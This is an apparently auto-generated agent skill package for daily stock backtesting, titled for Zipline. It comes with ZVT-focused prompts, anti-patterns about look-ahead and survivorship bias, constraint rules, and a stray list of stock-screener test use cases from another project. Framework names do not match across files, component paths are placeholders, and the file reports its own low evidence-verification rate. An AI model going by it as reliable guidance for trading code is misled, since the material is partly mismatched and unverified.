**Source**: `backend/tests/unit/test_ipo_scanner.py`

Screens for stocks with recent IPO dates that meet Minervini/CANSLIM criteria, identifying early-stage companies with growth potential.

## `KUC-013`
**Source**: `backend/tests/unit/test_custom_scanner.py`

Provides a configurable stock screener with custom filters for price, volume, RS rating, market cap, debt, sector, EPS/sales growth, and technical criteria.

## `KUC-014`
**Source**: `backend/tests/unit/test_setup_engine_screener.py`

Detects chart patterns (VCP, Cup-with-Handle, NR7, etc.) using normalized scoring and cross-detector calibration for trade setup quality assessment.

## `KUC-015`
**Source**: `backend/tests/unit/test_breadth_calculator.py`

Calculates market breadth metrics including the percentage of stocks above their moving averages to assess overall market health and participation.

## `KUC-016`
**Source**: `backend/tests/unit/test_scan_result_query_builder.py`

Builds and executes filtered, sorted, paginated queries on scan results with support for JSON field extraction and complex filter conditions.

## `KUC-017`
**Source**: `backend/tests/unit/test_quality_policy_scoring.py`

Applies quality-aware fallback policy to stock ratings based on data completeness, excluding low-quality signals and downgrading partial data.

## `KUC-018`
**Source**: `backend/tests/unit/test_validation_service.py`

Validates scan predictions against actual price outcomes, tracking win rates and accuracy across different time horizons (20, 50, 100 days).

## `KUC-019`
**Source**: `backend/tests/unit/test_stock_universe_service_index_membership.py`

Manages stock universe membership including active/inactive status, index constituents (SP500, HSI, NIKKEI225, TAIEX), and market/exchange categorization.

## `KUC-020`
**Source**: `backend/tests/unit/test_assistant_gateway_service.py`

Bridges Hermes AI assistant requests to backend services, handling conversation management, tool routing, and MCP watchlist writes.

## `KUC-021`
**Source**: `backend/tests/unit/test_theme_discovery_ingestion_tasks.py`

Ingests content from various sources (Twitter, Substack, news) for theme discovery, tracking content items and error states during extraction.

## `KUC-022`
**Source**: `backend/tests/unit/test_setup_engine_feature_flag.py`

Controls setup engine inclusion in scan orchestrator via feature flag, allowing silent filtering when disabled without breaking existing workflows.

## `KUC-023`
**Source**: `backend/tests/unit/test_hybrid_fundamentals_service.py`

Fetches fundamentals from multiple providers (yfinance, finviz) with market-aware routing policy, caching, and FX normalization for international stocks.

## `KUC-024`
**Source**: `backend/tests/unit/test_breadth_tasks.py`

Orchestrates daily breadth calculation tasks with warmup checks, refusing to publish when price cache warmup is incomplete.

## `KUC-025`
**Source**: `backend/tests/unit/test_pattern_calibration.py`

Normalizes scores across multiple pattern detectors using cross-detector calibration to ensure consistent quality and readiness scoring.

## `KUC-026`
**Source**: `backend/tests/unit/test_multilingual_qa_harness.py`

Validates multilingual text extraction pipeline (CJK alias resolution, language detection, ticker normalization) against golden corpora with precision/recall gates.

## `KUC-027`
**Source**: `backend/tests/unit/test_mcp_market_copilot.py`

Provides MCP tools for stock snapshots, scan results, breadth data, and watchlist management accessible to external AI agents via JSON-RPC.

## `KUC-028`
**Source**: `backend/tests/unit/test_custom_scanner_mixed_market.py`

Applies market-aware filtering policies for multi-market scans, using USD-normalized criteria when scanning across US, HK, JP, and TW markets.

## `KUC-029`
**Source**: `backend/tests/unit/test_universe_compat_adapter.py`

Adapts legacy universe request formats to typed UniverseDefinition with deprecation headers for gradual migration from old API style.

## `KUC-030`
**Source**: `backend/tests/unit/test_theme_content_recovery_logic.py`

Detects and recovers from theme content corruption by resetting storage and recreating data immediately after schema rewind.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **0**

FILE:references/components/api_layer.md
# api_layer (6 classes)

## `create_scan`
`api_layer/create-scan.py:0`

## `get_scan_results`
`api_layer/get-scan-results.py:0`

## `CreateScanUseCase.execute`
`api_layer/createscanusecase-execute.py:0`

## `RunBulkScanUseCase.execute`
`api_layer/runbulkscanusecase-execute.py:0`

## `Task backend`
`api_layer/task-backend.py:0`

## `API framework`
`api_layer/api-framework.py:0`

FILE:references/components/cache_infrastructure.md
# cache_infrastructure (5 classes)

## `PriceCacheService.get`
`cache_infrastructure/pricecacheservice-get.py:0`

## `FundamentalsCacheService.get`
`cache_infrastructure/fundamentalscacheservice-get.py:0`

## `BenchmarkCacheService.get_benchmark`
`cache_infrastructure/benchmarkcacheservice-get-benchmark.py:0`

## `Cache backend`
`cache_infrastructure/cache-backend.py:0`

## `Lock implementation`
`cache_infrastructure/lock-implementation.py:0`

FILE:references/components/data_collection_layer.md
# data_collection_layer (5 classes)

## `DataPreparationLayer.fetch_stock_data`
`data_collection_layer/datapreparationlayer-fetch-stock-data.py:0`

## `StockDataProvider.get_stock_data`
`data_collection_layer/stockdataprovider-get-stock-data.py:0`

## `DataRequirements.merge`
`data_collection_layer/datarequirements-merge.py:0`

## `StockDataProvider port`
`data_collection_layer/stockdataprovider-port.py:0`

## `Cache backend`
`data_collection_layer/cache-backend.py:0`

FILE:references/components/pattern_detection_layer_-setup_engine.md
# pattern_detection_layer_(setup_engine) (6 classes)

## `PatternDetector.detect`
`pattern_detection_layer_(setup_engine)/patterndetector-detect.py:0`

## `PatternDetector.detect_safe`
`pattern_detection_layer_(setup_engine)/patterndetector-detect-safe.py:0`

## `SetupEngineAggregator.aggregate`
`pattern_detection_layer_(setup_engine)/setupengineaggregator-aggregate.py:0`

## `BreakoutReadinessFeatures.compute`
`pattern_detection_layer_(setup_engine)/breakoutreadinessfeatures-compute.py:0`

## `Detector implementation`
`pattern_detection_layer_(setup_engine)/detector-implementation.py:0`

## `Parameter profile`
`pattern_detection_layer_(setup_engine)/parameter-profile.py:0`

FILE:references/components/persistence_layer.md
# persistence_layer (5 classes)

## `SqlScanResultRepository.query`
`persistence_layer/sqlscanresultrepository-query.py:0`

## `SqlFeatureStoreRepository.publish_atomically`
`persistence_layer/sqlfeaturestorerepository-publish-atomic.py:0`

## `FeatureRun.state_transition`
`persistence_layer/featurerun-state-transition.py:0`

## `Repository implementation`
`persistence_layer/repository-implementation.py:0`

## `Query dialect`
`persistence_layer/query-dialect.py:0`

FILE:references/components/scoring_and_rating_layer.md
# scoring_and_rating_layer (5 classes)

## `calculate_composite_score`
`scoring_and_rating_layer/calculate-composite-score.py:0`

## `calculate_overall_rating`
`scoring_and_rating_layer/calculate-overall-rating.py:0`

## `apply_quality_policy`
`scoring_and_rating_layer/apply-quality-policy.py:0`

## `Scoring weights`
`scoring_and_rating_layer/scoring-weights.py:0`

## `Quality threshold`
`scoring_and_rating_layer/quality-threshold.py:0`

FILE:references/components/screening_execution_layer.md
# screening_execution_layer (5 classes)

## `ScanOrchestrator.scan_stock_multi`
`screening_execution_layer/scanorchestrator-scan-stock-multi.py:0`

## `BaseStockScreener.scan_stock`
`screening_execution_layer/basestockscreener-scan-stock.py:0`

## `ScreenerRegistry.get`
`screening_execution_layer/screenerregistry-get.py:0`

## `Screener implementation`
`screening_execution_layer/screener-implementation.py:0`

## `Composite scoring method`
`screening_execution_layer/composite-scoring-method.py:0`

ClawHub Backend Testing+2

T@clawhub-tangweigang-jpg-8679fec286

Zipline Daily Backtest

Skill

使用 Zipline 框架执行日频股票策略回测，支持多市场数据接入、因子研究、可视化绩效分析，默认本金千万级。。

---
name: zipline-daily-backtest
description: |-
  使用 Zipline 框架执行日频股票策略回测，支持多市场数据接入、因子研究、可视化绩效分析，默认本金千万级。。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-088"
  compiled_at: "2026-04-22T13:00:36.495372+00:00"
  capability_markets: "multi-market"
  capability_activities: "backtesting, factor-research"
  sop_version: "crystal-compilation-v6.1"
---
# Zipline 日频回测 (zipline-daily-backtest)

> 使用 Zipline 框架执行日频股票策略回测，支持多市场数据接入、因子研究、可视化绩效分析，默认本金千万级。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (3 total)

### Zipline Documentation Deployment (`UC-101`)
Automates the process of building and deploying Zipline documentation by cleaning old artifacts, moving files to temporary locations, and preparing do
**Triggers**: deploy, documentation, docs

### Zipline Getting Started Tutorial (`UC-102`)
Provides an interactive tutorial for new Zipline users to learn the platform's core concepts including data ingestion, algorithm execution via CLI and
**Triggers**: tutorial, getting started, learn

### Basic Buy-and-Hold Tutorial Algorithm (`UC-103`)
Demonstrates a minimal Zipline algorithm that places consistent buy orders for a single stock and records price data for later analysis, serving as a
**Triggers**: example, buy apple, simple order

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (25 total)

- **`AP-ZVT-183`**: 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败
- **`AP-ZVT-179`**: 第三方数据接口超限后异常被吞噬，数据静默缺失
- **`AP-ZVT-183B`**: HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移

All 25 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-088. Evidence verify ratio = 48.1% and audit fail total = 19. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 25 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-088` blueprint at 2026-04-22T13:00:36.495372+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['Basic Buy-and-Hold Tutorial Algorithm', 'Zipline Getting Started Tutorial', 'Zipline Documentation Deployment', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **25**

## qlib (9)

### `AP-QLIB-1930` — 回测结果与模型无关——共享 dataset 对象导致预测值被首次模型覆盖 <sub>(high)</sub>

Qlib 中多个模型复用同一个已 fit 的 DatasetH 实例时，dataset 内部的标准化 参数（fit_start_time/fit_end_time 决定的归一化统计量）在第一次 fit 后固化。 切换模型但不重新初始化 dataset，导致所有模型实际使用同一套预测信号。表现为 无论换 LightGBM/XGBoost/DNN，回测净值曲线完全一致。这是最危险的"实验看起来 在跑，但结论全部无效"反模式。

Source: https://github.com/microsoft/qlib/issues/1930

### `AP-QLIB-2090` — fit_start_time 与 train segment 双重配置引发隐式数据泄露 <sub>(high)</sub>

Qlib DatasetH 有两个"训练数据范围"：handler 的 fit_start_time/fit_end_time （决定归一化器拟合范围）和 segments.train（决定模型训练范围）。常见错误是 让 fit_end_time 覆盖 valid/test 段，使归一化统计量（均值、标准差）包含了 未来数据，造成前向偏差（look-ahead bias）。两者独立配置但语义耦合，文档 未明确说明 fit_end_time 必须 <= train_end。

Source: https://github.com/microsoft/qlib/issues/2090

### `AP-QLIB-2036` — MACD 因子公式文档错误——DEA 被多除一次 CLOSE 导致量纲不一致 <sub>(high)</sub>

Qlib 官方文档中的 Alpha 公式示例将 MACD 的 DEA 定义为 EMA(DIF, 9) / CLOSE， 但 DIF 已经是无量纲（除过 CLOSE 的），再次除以 CLOSE 导致 DEA 量纲为 1/price。 基于此文档公式构建的 MACD 因子在截面标准化后与正确公式差异显著，IC 下降。 此类文档层面的公式错误会被大量用户直接照搬入生产因子库。

Source: https://github.com/microsoft/qlib/issues/2036

### `AP-QLIB-2184` — 自定义 A 股数据导入前未按约定填充停牌日 NaN，引发下游因子噪声 <sub>(high)</sub>

Qlib 约定停牌日 open/close/high/low/volume/factor 字段均应填 NaN，以便框架 在因子计算时识别并跳过。用户自建 A 股数据集时若将停牌日保留为上一日价格 （常见于从东财/Wind 直接导出的数据），会导致停牌期间的价格动量因子出现 "假信号"（价格不变但因子非零）。Qlib 不校验此约定，错误静默流入训练数据。

Source: https://github.com/microsoft/qlib/issues/2184

### `AP-QLIB-1892` — PIT（Point-In-Time）财务数据收集器依赖外部股票列表接口，全量 A 股获取不完整 <sub>(high)</sub>

Qlib 的 PIT 数据收集器（财务数据时间点快照）在初始化时调用 get_hs_stock_symbols() 获取沪深股票列表。该函数依赖东财 API，经常仅返回 部分列表而非全量 5000+ 股票，且函数在获取不完整时直接 raise ValueError。 用户若按文档步骤操作，财务数据集将只覆盖部分股票，基于 PIT 财务因子的回测 存在严重生存者偏差（未被采集的股票被隐式排除）。

Source: https://github.com/microsoft/qlib/issues/1892

### `AP-QLIB-2097` — 全市场 instrument="all" 在 32GB 内存机器上 OOM，但 CSI300 正常 <sub>(medium)</sub>

Qlib 在加载 Alpha158 特征时会将指定 universe 的全部特征矩阵一次性载入内存。 使用 instrument="csi300"（300 股）与 instrument="all"（5000+ 股）的内存占用 差约 16 倍。32GB 机器跑全市场时在 init_instance_by_config 阶段直接 OOM， 错误信息不提示内存问题。用户容易误以为是配置错误，实际上需要分批加载或 使用流式特征计算。

Source: https://github.com/microsoft/qlib/issues/2097

### `AP-QLIB-1984` — LightGBM 模型标签维度校验逻辑永远不触发导致多标签训练静默失败 <sub>(medium)</sub>

Qlib gbdt.py 中用 y.values.ndim == 2 判断是否为多标签，但从 DataFrame 取出的 Series 的 ndim 永远为 1，条件永远为 False，因此多标签训练不会走 squeeze 分支，而是直接进入 LightGBM 训练并在更深处抛出语义不明的错误。 用户尝试自定义多标签任务时无法从错误信息定位到此根因。

Source: https://github.com/microsoft/qlib/issues/1984

### `AP-QLIB-1915` — 自定义 CSV 数据 dump_bin 后 DataHandler 报 Length mismatch，D.features 却正常 <sub>(high)</sub>

Qlib 存在两套数据访问路径：D.features（直接读 binary）和 DataHandler/DataHandlerLP （带 processor pipeline）。自定义 A 股 CSV 数据在 dump_bin 时若字段顺序 或 symbol 格式（如 600000.SH vs SH600000）与 Qlib 约定不符，DataHandler 的 processor 在 align/reindex 时触发 Length mismatch，而 D.features 因不 经过 processor 而成功。这一"两套路径行为不一致"让用户误以为数据已正确导入。

Source: https://github.com/microsoft/qlib/issues/1915

### `AP-QLIB-1949` — Colab/Linux 多进程后端与 Qlib ParallelExt 冲突导致 DataHandler 完全不可用 <sub>(medium)</sub>

Qlib 在非 fork 环境（Windows 或 Google Colab）中，DataHandler 使用 joblib 并行加载特征时，ParallelExt 初始化时访问 _backend_args 属性失败（AttributeError）。 根因是 joblib 1.5+ 移除了该内部属性，Qlib 的兼容层未更新。表现为 D.features 调用抛出多层嵌套异常，用户无法从错误栈判断是并行后端问题还是数据问题。

Source: https://github.com/microsoft/qlib/issues/1949

## vnpy (4)

### `AP-VNPY-3691` — K 线生成器首根 K 线时间戳不对齐，导致第一个周期信号错误 <sub>(high)</sub>

vnpy BarGenerator 在合成 N 分钟 K 线时，第一根推送的 K 线时间戳为"当前 tick 所在分钟"而非"完整 N 分钟周期结束时间"。具体表现：09:59 的 tick 会 触发一根不完整的 5 分钟 K 线推送（本应等到 10:04 才推送）。策略若在 on_bar 中直接用 datetime.minute % 5 过滤，第一根 K 线恰好通过，但包含的 数据不足一个完整周期，用于信号计算会产生错误的开仓信号。

Source: https://github.com/vnpy/vnpy/issues/3691

### `AP-VNPY-3669` — Alpha 模块历史数据增量保存时新旧 DataFrame schema 不兼容导致 SchemaError <sub>(medium)</sub>

vnpy Alpha 模块在保存 K 线数据到 Parquet 文件时，将新下载数据（可能含 Float64 列）与已存文件（历史 Int64 列）直接 polars.concat。polars 强类型 不允许隐式类型提升，抛出 SchemaError。根因是不同数据源/版本返回的字段类型 不一致（如 volume 在部分行情源为整数，在另一些为浮点），且 concat 前无 schema 对齐步骤。影响所有使用 vnpy alpha 进行回测的历史数据构建流程。

Source: https://github.com/vnpy/vnpy/issues/3669

### `AP-VNPY-3685` — 价差交易模块 run_backtesting() 在 Jupyter 环境下静默报错，结果不可信 <sub>(high)</sub>

vnpy 4.10 价差交易（SpreadTrading）模块的 run_backtesting() 在 Jupyter 环境下存在事件循环冲突（asyncio already running），导致回测引擎部分逻辑 不执行但不抛异常，返回看似正常的回测统计数据。同样代码在命令行 Python 中无此问题。vnpy 4.x 将部分 IO 改为 async 但 Jupyter 的事件循环与之不兼容， 是"回测结果看起来正确但实际不完整"的隐蔽陷阱。

Source: https://github.com/vnpy/vnpy/issues/3685

### `AP-VNPY-3700` — 安装脚本不使用 venv 导致全局 numpy 版本被降级破坏其他依赖 <sub>(medium)</sub>

vnpy install.bat 直接在系统/conda base 环境安装，会强制降级 numpy 到 <2.0 以满足 vnpy 依赖，破坏依赖 numpy 2.x 的其他量化工具（如 scipy、pytorch 新版）。 没有 requirements.txt，依赖边界不透明。在多工具共存的量化研究环境中， vnpy 的安装脚本是"全局环境污染"的常见根源。

Source: https://github.com/vnpy/vnpy/issues/3700

## zipline (6)

### `AP-ZIPLINE-138` — 回测价格为未复权价，教程图表误导用户误判策略收益 <sub>(high)</sub>

Zipline 教程使用 AAPL 股价图做演示，但 bundle 中存储的是未复权价格（raw price）， 而非经过拆股/分红调整的复权价。图表显示的历史价格与市场实际价约差 4 倍（Apple 历次拆股累计因子），用户误将"价格翻 4 倍"当作策略收益。A 股场景更严重： 除权前后价格跳变会在未复权数据中形成巨大"信号"，吸引技术指标在除权日产生 虚假突破信号。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/138

### `AP-ZIPLINE-235` — 默认以当根 K 线收盘价成交，低估实盘滑点，策略回测收益虚高 <sub>(high)</sub>

Zipline 默认滑点模型在当根 K 线触发信号后，以同根 K 线收盘价成交（current bar close fill）。实盘中信号只能在下一根 K 线的开盘价附近成交（T+1 order execution）。以 A 股日线为例，用收盘价回测比用次日开盘价成交平均高估日收益 约 0.1-0.3%，年化差距可超 30%。需显式配置 slippage model 为 VolumeShareSlippage 或 FixedSlippage 并设合理 volume_limit。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/235

### `AP-ZIPLINE-190` — 日历 start_session 设为非交易日触发 DateOutOfBounds，无提示如何修正 <sub>(medium)</sub>

Zipline 在注册 bundle 或运行算法时，若 start_session 参数恰好是非交易日 （如 1998-01-01 元旦），Calendar 校验抛出 DateOutOfBounds（"cannot be earlier than the first session"）。错误信息仅显示交易日历起始日，不提示"请改为第一个 交易日"。A 股场景：使用 SSE/SZSE 日历时，若 start_date 恰好是春节前最后 一天次日（节假日），会触发同类错误，调试成本极高。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/190

### `AP-ZIPLINE-181` — asset db 过期后 Pipeline 报"no assets traded"，误导用户排查数据范围 <sub>(high)</sub>

Zipline 的 asset database（SQLite）记录每只股票的 start/end 交易日期。若 使用了旧版 Quandl/自建 bundle 且未重新 ingest，在回测新日期范围时 Pipeline 抛出 "Failed to find any assets with country_code 'US' that traded between [dates]"。A 股场景：重新下载行情后若只更新价格数据而未重建 asset db，退市/ 新上市股票的日期范围不更新，Pipeline 过滤会悄悄排除这些股票，产生生存者偏差。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/181

### `AP-ZIPLINE-285` — week_start()/week_end() 在自定义日历（非美股）下静默失效 <sub>(medium)</sub>

Zipline schedule_function 的 date_rules.week_start() 和 date_rules.week_end() 依赖交易日历的周首/周末判断逻辑，但在非美股日历（如 ASX、SSE）中，该逻辑 与 NYSE 日历的偏移计算不兼容，导致 schedule 永远不触发或在错误的日期触发。 A 股场景：使用 SSE 日历时，含春节等连续长假的周，week_start 可能跳过整个 假期周而不调仓，但用户无法从日志发现未触发的调度。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/285

### `AP-ZIPLINE-240` — 回测日期时区必须为 UTC，传入 naive datetime 引发深层 AssertionError <sub>(medium)</sub>

Zipline 内部强制要求所有时间戳为 UTC aware datetime。当用户传入 naive datetime （无时区信息，如 pd.Timestamp('2020-01-01')）时，不在入口处报错，而是在 算法执行深处触发 AssertionError: Algorithm should have a utc datetime，栈深 难以定位。A 股开发者从本地 CST 时间导入数据时极易触发此陷阱，需在 bundle 注册时显式 tz_localize('UTC')。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/240

## zvt (6)

### `AP-ZVT-183` — 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败 <sub>(high)</sub>

ZVT 在计算前复权因子时以 new/old 价格比计算 qfq_factor。当 old==0（新股首日 或数据缺失）时因子为 inf；当 kdata.open 本身为 None（停牌日未填充）时乘法 抛出 TypeError。结果：整个 entity 的复权计算中断，后续 K 线全部丢失，但主 流程只 log ERROR 不中断，用户往往不知道已有大量股票数据损坏。

Source: https://github.com/zvtvz/zvt/issues/183

### `AP-ZVT-179` — 第三方数据接口超限后异常被吞噬，数据静默缺失 <sub>(high)</sub>

ZVT 使用聚宽 jqdatasdk 批量拉取全市场 K 线时（4000+ 股票），触发聚宽每日 最大查询条数限制（错误：已超过每日最大查询数量）。ZVT 捕获异常后继续执行下一 entity，导致超限后所有股票的当日数据均静默缺失。回测若使用该残缺数据库，因 子计算结果将产生系统性偏差，且无告警。

Source: https://github.com/zvtvz/zvt/issues/179

### `AP-ZVT-161` — 全市场 SQLite 批量因子计算触发 too many SQL variables 错误 <sub>(medium)</sub>

ZVT 在计算 VolumeUpMaFactor 等多股因子时，将所有 entity_id 拼入单条 SQL 的 IN 子句。当 A 股全市场（5000+ 股）一次性查询时，触发 SQLite 默认限制 SQLITE_MAX_VARIABLE_NUMBER=999。调大 max_allowed_packet（MySQL 参数）无效， 根因是 SQLite 变量数上限。正确解法是分批查询，但 ZVT 早期版本未处理此边界。

Source: https://github.com/zvtvz/zvt/issues/161

### `AP-ZVT-129` — 使用通配符导入隐藏 API 版本变更，AdjustType 等枚举莫名消失 <sub>(medium)</sub>

ZVT 文档示例使用 `from zvt import *` 导入所有符号。当 ZVT 版本升级重构 枚举（如将 AdjustType 移入子模块）后，通配符导入不再包含该符号，触发 AttributeError。使用者误以为是安装问题，实际是版本间 API breaking change 未在 CHANGELOG 中标注，且通配符导入掩盖了具体来源。应显式 import 枚举类。

Source: https://github.com/zvtvz/zvt/issues/129

### `AP-ZVT-187` — 回测引擎未在数据层空结果时提前终止，导致空指针级联崩溃 <sub>(medium)</sub>

ZVT Trader 在 load_data 完成后检查数据为空时，不提前退出，而是将空 DataFrame 传入 selector 计算，触发后续 NoneType 操作链式崩溃。错误栈深且难以定位根因， 用户误以为是策略逻辑问题。根因是数据时间窗口配置错误（start/end 不在数据 库覆盖范围内）但无有效校验。

Source: https://github.com/zvtvz/zvt/issues/187

### `AP-ZVT-183B` — HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移 <sub>(high)</sub>

ZVT 提供 Stock1dKdata（不复权）、Stock1dHfqKdata（后复权）、Stock1dQfqKdata （前复权）三张独立表。用户在计算价格动量/均线因子时混用两张表（如用不复权 做均线，用后复权做收益率），导致除权日前后因子值产生跳变。ZVT 不做跨表 复权类型一致性校验，混用静默通过。

Source: https://github.com/zvtvz/zvt/issues/183

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-088--zipline-reloaded
**Scan date**: 2026-04-22
**Stats**: {'total_files': 8, 'total_classes': 34, 'total_functions': 0, 'total_stages': 8}

## Modules (8)

- [data_ingestion/bundles](components/data_ingestion-bundles.md): 3 classes
- [asset_management](components/asset_management.md): 4 classes
- [pipeline_computation_engine](components/pipeline_computation_engine.md): 5 classes
- [trading_simulation](components/trading_simulation.md): 5 classes
- [order_management_&_execution](components/order_management_-_execution.md): 6 classes
- [portfolio_accounting_&_metrics](components/portfolio_accounting_-_metrics.md): 4 classes
- [data_access_layer](components/data_access_layer.md): 5 classes
- [fx/currency_conversion](components/fx-currency_conversion.md): 2 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 123
  fatal_constraints_count: 72
  non_fatal_constraints_count: 215
  use_cases_count: 3
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

## Domain Constraints Injected (39)

- **`SHARED-BT-LAB-001`** <sub>(fatal)</sub>: 未来函数（Lookahead Bias）：在模拟历史时间点 t 的交易决策时， 不得使用 t 时刻之后才能知道的信息。最常见形式： (1) 使用收盘价计算信号并同日以收盘价成交； (2) 将 T 日收盘后计算的指标标记在同一根 K 线； (3) 使用当日最高/最低价作为成交假设。 信号计算与成交时间必须对齐：T 日收盘后计算信号，T+1 日开盘成交。
- **`SHARED-BT-LAB-002`** <sub>(high)</sub>: 指标预热期（Warmup Period）处理：滚动窗口指标在前 N 个 bar 时 NaN， 这些 bar 不应参与信号计算和持仓决策。强制要求指标的 warmup_period 与最长 lookback 期等长，且 warmup 期间持仓应置零。
- **`SHARED-BT-LAB-003`** <sub>(fatal)</sub>: ML/DL 模型时序数据划分必须按时间顺序：TRAIN < VALID < TEST， 不可使用随机 k-fold 分折（会将未来数据混入训练集）。 应使用 TimeSeriesSplit 或 Walk-Forward 验证。
- **`SHARED-BT-LAB-004`** <sub>(fatal)</sub>: 开盘价/最高价/最低价成交假设：日线回测中假设每日可以最高价卖出或 最低价买入（如动量策略"最高价止盈"），这是明显的 lookahead， 因为日内最高/最低价只有收盘后才能确认。成交价只能用开盘价或 前一日收盘价（带滑点）。
- **`SHARED-BT-LAB-005`** <sub>(high)</sub>: 数据对齐偏移（Off-by-one）：pandas rolling/shift 等操作容易引入细微的 1 期偏移错误。应在代码中明确记录每个序列的"观测时间点"， 并通过 assert 验证关键时间对齐关系。
- **`SHARED-BT-LAB-006`** <sub>(high)</sub>: 过度优化（Overfitting）：回测数量越多，过拟合概率越高。 Bailey et al.（2014）证明 Optimal Sharpe Ratio 期望值随回测次数单调递减。 应使用 Walk-Forward 验证代替 in-sample 参数穷举，并报告 Deflated Sharpe Ratio（DSR）而非峰值 Sharpe。
- **`SHARED-BT-SURV-001`** <sub>(fatal)</sub>: 幸存者偏差（Survivorship Bias）：使用当前市场成分股作为历史回测股票池， 会遗漏曾经存在但后来退市、摘牌或被合并的股票，系统性高估策略历史收益率。 回测股票池必须使用历史时点快照（point-in-time universe）。
- **`SHARED-BT-SURV-002`** <sub>(high)</sub>: In-Sample / Out-of-Sample 划分：策略开发、参数选择必须在样本内完成， 样本外数据仅用于最终验证，不可多次"看"样本外数据后继续调优 （会将样本外变为新的样本内，重蹈过拟合）。
- **`SHARED-BT-SURV-003`** <sub>(high)</sub>: 停牌/缺失数据的填充策略：停牌日价格不可简单用前一日收盘价 forward-fill， 因为这会在复盘时造成"零成交量"日参与了因子计算和信号生成。 应在因子计算层显式过滤缺失交易日，不填充。
- **`SHARED-BT-SURV-004`** <sub>(high)</sub>: 异常值（Extreme Value）污染：原始市场数据可能含有数据源错误（如除权未 及时调整、手工录入错误导致的极端价格），不清洗直接进入因子计算会产生 极端信号，污染整个横截面。应在 pipeline 入口处过滤 3-sigma 异常值。
